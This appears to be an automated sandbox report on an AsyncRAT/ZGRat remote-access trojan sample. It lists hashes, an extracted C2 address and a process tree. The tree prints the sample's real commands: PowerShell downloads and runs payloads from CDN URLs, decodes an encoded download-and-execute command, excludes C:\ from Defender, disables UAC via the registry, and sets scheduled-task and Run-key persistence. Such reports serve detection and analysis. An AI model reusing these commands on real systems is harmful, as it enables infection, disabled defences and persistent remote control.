Analysis

  • max time kernel
    154s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20231023-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15/11/2023, 10:44

General

  • Target

    resources.exe

  • Size

    65KB

  • MD5

    693a87312aa1f6a31906187bda5293df

  • SHA1

    aaf236f3c5e791bd4f98d2c12758ff251c3b8474

  • SHA256

    f33cdca93db97c4b84af9f01216f3b7bcb3cf1865df84cb3b64fbbeed7057a2a

  • SHA512

    1c6e618ddb11d438286a032e6acd79fcb5fd89efa4fd2f3b1b4ae91785ac4a7ef8b894b910cd8394225118974e7a19aeb337313273cda2d2b0d9923cb3a212e2

  • SSDEEP

    1536:dfHn5T82s45tlDqwIdvKKBLutvfFoV/XUuL:dfH5TZsYnjIdbCNNoV/Xt

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WinDefault

C2

46.1.103.69:4263

Mutex

WinDefault

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

OperaCert

C2

46.1.103.69:7355

Mutex

OperaCert

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Detect ZGRat V1 31 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 14 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 16 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\resources.exe
    "C:\Users\Admin\AppData\Local\Temp\resources.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2784
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\ac3394b1-15fa-4530-a4f8-44c3419ad2ab.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1496
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2168
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4436
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2512
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3532
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 2
        3⤵
        • Delays execution with timeout.exe
        PID:3872
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1952
      • C:\Users\Public\Music\RunNihaiersion.exe
        RunNihaiersion.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4632
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2224
          • C:\Windows\SysWOW64\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 session
              6⤵
                PID:4596
            • C:\Users\Public\Music\israil.exe
              "C:\Users\Public\Music\israil.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:448
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:940
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4000
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3032
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1932
                • C:\Users\Admin\AppData\Local\Temp\xx.exe
                  xx.exe
                  7⤵
                  • Executes dropped EXE
                  PID:5012
                  • C:\Windows\system32\cmd.exe
                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
                    8⤵
                      PID:1612
                      • C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
                        C:\Users\Admin\AppData\Local\Temp\dSu6WJb0QA.exe
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        PID:2900
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"
                          10⤵
                          • Blocklisted process makes network request
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3784
                          • C:\Users\Admin\AppData\Roaming\2WinDefault.exe
                            "C:\Users\Admin\AppData\Roaming\2WinDefault.exe"
                            11⤵
                            • Executes dropped EXE
                            PID:1380
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 804
                              12⤵
                              • Program crash
                              PID:1440
                    • C:\Windows\system32\cmd.exe
                      "cmd" /C C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
                      8⤵
                        PID:4384
                        • C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
                          C:\Users\Admin\AppData\Local\Temp\deFLhxlhO6.exe
                          9⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:1304
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                            10⤵
                            • Blocklisted process makes network request
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4316
                            • C:\Users\Admin\AppData\Roaming\ChromeCrt.exe
                              "C:\Users\Admin\AppData\Roaming\ChromeCrt.exe"
                              11⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4712
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                12⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1100
                      • C:\Windows\system32\cmd.exe
                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
                        8⤵
                          PID:112
                          • C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
                            C:\Users\Admin\AppData\Local\Temp\2MFBYnhJev.exe
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:4252
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                              10⤵
                              • Blocklisted process makes network request
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1408
                              • C:\Users\Admin\AppData\Roaming\VisualStudioo.exe
                                "C:\Users\Admin\AppData\Roaming\VisualStudioo.exe"
                                11⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4124
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  #cmd
                                  12⤵
                                    PID:5012
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    #cmd
                                    12⤵
                                    • Suspicious use of SetThreadContext
                                    PID:3312
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'VisualStudioCert' -Value '"C:\Users\Admin\AppData\Roaming\VisualStudioCert\VisualStudioCert.exe"' -PropertyType 'String'
                                      13⤵
                                        PID:3696
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                        13⤵
                                          PID:2800
                              • C:\Windows\system32\cmd.exe
                                "cmd" /C C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
                                8⤵
                                  PID:4288
                                  • C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
                                    C:\Users\Admin\AppData\Local\Temp\ljzWLt20Y4.exe
                                    9⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    PID:1564
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                                      10⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2204
                                      • C:\Users\Admin\AppData\Roaming\OperaCrt.exe
                                        "C:\Users\Admin\AppData\Roaming\OperaCrt.exe"
                                        11⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2128
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "cmd" /C schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                          12⤵
                                            PID:2288
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /create /tn \OperaCert /tr "C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                              13⤵
                                              • Creates scheduled task(s)
                                              PID:3100
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            #cmd
                                            12⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:448
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OperaCert' -Value '"C:\Users\Admin\AppData\Roaming\OperaCert\OperaCert.exe"' -PropertyType 'String'
                                            12⤵
                                            • Adds Run key to start application
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:684
                                  • C:\Windows\system32\cmd.exe
                                    "cmd" /C C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
                                    8⤵
                                      PID:1100
                                      • C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
                                        C:\Users\Admin\AppData\Local\Temp\n4vdGlPOcH.exe
                                        9⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        PID:528
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
                                          10⤵
                                          • Blocklisted process makes network request
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:656
                                          • C:\Users\Admin\AppData\Roaming\WiDefault.exe
                                            "C:\Users\Admin\AppData\Roaming\WiDefault.exe"
                                            11⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4004
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WinDefatullt' -Value '"C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe"' -PropertyType 'String'
                                              12⤵
                                              • Adds Run key to start application
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:528
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "cmd" /C schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                              12⤵
                                                PID:3052
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /create /tn \WinDefatullt /tr "C:\Users\Admin\AppData\Roaming\WinDefatullt\WinDefatullt.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                                                  13⤵
                                                  • Creates scheduled task(s)
                                                  PID:1836
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                #cmd
                                                12⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2812
                                      • C:\Windows\system32\cmd.exe
                                        "cmd" /C C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
                                        8⤵
                                          PID:380
                                          • C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
                                            C:\Users\Admin\AppData\Local\Temp\LcsJTY4jpV.exe
                                            9⤵
                                            • Drops startup file
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4104
                                        • C:\Windows\system32\cmd.exe
                                          "cmd" /C C:\Users\Admin\AppData\Local\Temp\6DLQBnKtiL.exe
                                          8⤵
                                            PID:3048
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 8
        3⤵
        • Delays execution with timeout.exe
        PID:4988
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4104
      • C:\Users\Public\Music\RunihaiVersion.exe
        RunihaiVersion.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4892
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4784
          • C:\Users\Public\Music\israil2.exe
            "C:\Users\Public\Music\israil2.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:4048
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "
              6⤵
                PID:3696
              • C:\Windows\SysWOW64\reg.exe
                reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                7⤵
                • UAC bypass
                • Modifies registry key
                PID:4864
          • C:\Windows\SysWOW64\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2828
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4108
  • C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 session
    1⤵
      PID:1304
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1380 -ip 1380
    1⤵
      PID:2168

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n4vdGlPOcH.exe.log

    Filesize

    226B

    MD5

    28d7fcc2b910da5e67ebb99451a5f598

    SHA1

    a5bf77a53eda1208f4f37d09d82da0b9915a6747

    SHA256

    2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

    SHA512

    2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\israil2.exe.log

    Filesize

    226B

    MD5

    916851e072fbabc4796d8916c5131092

    SHA1

    d48a602229a690c512d5fdaf4c8d77547a88e7a2

    SHA256

    7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

    SHA512

    07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    1KB

    MD5

    4280e36a29fa31c01e4d8b2ba726a0d8

    SHA1

    c485c2c9ce0a99747b18d899b71dfa9a64dabe32

    SHA256

    e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

    SHA512

    494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    06ad34f9739c5159b4d92d702545bd49

    SHA1

    9152a0d4f153f3f40f7e606be75f81b582ee0c17

    SHA256

    474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

    SHA512

    c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    687ff3bb8a8b15736d686119a681097c

    SHA1

    18f43aa14e56d4fb158a8804f79fc3c604903991

    SHA256

    51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2

    SHA512

    047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                          Filesize

                                          53KB

                                          MD5

                                          687ff3bb8a8b15736d686119a681097c

                                          SHA1

                                          18f43aa14e56d4fb158a8804f79fc3c604903991

                                          SHA256

                                          51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2

                                          SHA512

                                          047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                          Filesize

                                          53KB

                                          MD5

                                          687ff3bb8a8b15736d686119a681097c

                                          SHA1

                                          18f43aa14e56d4fb158a8804f79fc3c604903991

                                          SHA256

                                          51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2

                                          SHA512

                                          047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                          Filesize

                                          53KB

                                          MD5

                                          687ff3bb8a8b15736d686119a681097c

                                          SHA1

                                          18f43aa14e56d4fb158a8804f79fc3c604903991

                                          SHA256

                                          51fd45579a0bee4beabbf7aa825ccc646f907dfdf27b2fc1791fa47dc90d5aa2

                                          SHA512

                                          047b21b92e74c93f264e2547900decd295f3089b22165372c4060b76bb813ffa6f2af924974936e25a2db551ea1eec722329ae78e1fff08f6f104d041090094a

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          16KB

                                          MD5

                                          8dff0ea200abe0db68b89cd9ee373a86

                                          SHA1

                                          543c8df3221e9f1b872e3dfcffc24f2d14a7ac0a

                                          SHA256

                                          b7d40a4455dffbd410178887871eae4f9a8c11d50aeccdcf082836a529e04c7f

                                          SHA512

                                          621bee5e7950b4ae9a20ae6d2f3dced3b9c21d8835bce6feb8854a8a5e3e54571a2a9c8c894a06982f46ab572b78aa658ce6a8aad81ae257b7d814c088709c75

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          16KB

                                          MD5

                                          d8fe6f08f93bce59a32e1dd53220ed93

                                          SHA1

                                          46ef4de2bde6a43f1526f87b3a2136f59fe386b0

                                          SHA256

                                          43712035089e489ecf1ccfd1b20c259d97791cc37cf0aac9a966e107cc039f89

                                          SHA512

                                          fc0a366751b96a849fc533069bd3844cbbfe2156a933b527c5793f169527b1fb5d5a4ef48dea6969f3695e6eab7bc046b1d6f89492482bd99e97c9f42893308c

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          16KB

                                          MD5

                                          c3d6d729eff6649ceccec1c3c472baef

                                          SHA1

                                          49fbaf7d60bd9a4d496d2804a38bc843bfe9428f

                                          SHA256

                                          5ab2d2d9eb1247a292eb387efbfc40e8afe47322eedaa2f8a68b807c604abd50

                                          SHA512

                                          4a803658111a264a065e226278fcedfd64b8c17ad25c9a85d00440a35d432ff2c3f13e009fe6e3843f68672237e597b87900f151617b39aa1cb9e2dc3d5dd0bc

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          19KB

                                          MD5

                                          62d0a8f2dde92001b69bb430c8fee54c

                                          SHA1

                                          9bb2225f9ed5cb3c71c9f166f0fb7a42a7c316ec

                                          SHA256

                                          bd5bcb0c12d851d5e41646c4673e9af1daf7b37743e3b32d7b3754e16732f3f1

                                          SHA512

                                          a69090461e797b37877e4237686ddf4fe055da4525436660a874fb868a426299bf01fc3373decc3f51b5ebdd3267dc0d7d303ee4c7d1d8fb72704d3190e20174

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          18KB

                                          MD5

                                          b8dd057b34ef460c75e2cf850597e6af

                                          SHA1

                                          92021d50c99ffc1e1a17a71a074bc8b4b527a129

                                          SHA256

                                          c1d2643bc959026a9427cbe29be2ee034ad06ff84d56c9c00d8afa7a9ae0c5e3

                                          SHA512

                                          007afaa52783e911c16512cd0fad7e1711d18df9d37d58906d49d9724523bbb0836cf6d53d79d12c4f1186cbc0680747126f8850e07860cc6d8320d45d729235

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          18KB

                                          MD5

                                          b8dd057b34ef460c75e2cf850597e6af

                                          SHA1

                                          92021d50c99ffc1e1a17a71a074bc8b4b527a129

                                          SHA256

                                          c1d2643bc959026a9427cbe29be2ee034ad06ff84d56c9c00d8afa7a9ae0c5e3

                                          SHA512

                                          007afaa52783e911c16512cd0fad7e1711d18df9d37d58906d49d9724523bbb0836cf6d53d79d12c4f1186cbc0680747126f8850e07860cc6d8320d45d729235

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          18KB

                                          MD5

                                          9abf12be9f3d525dd3c104f6e0470c9e

                                          SHA1

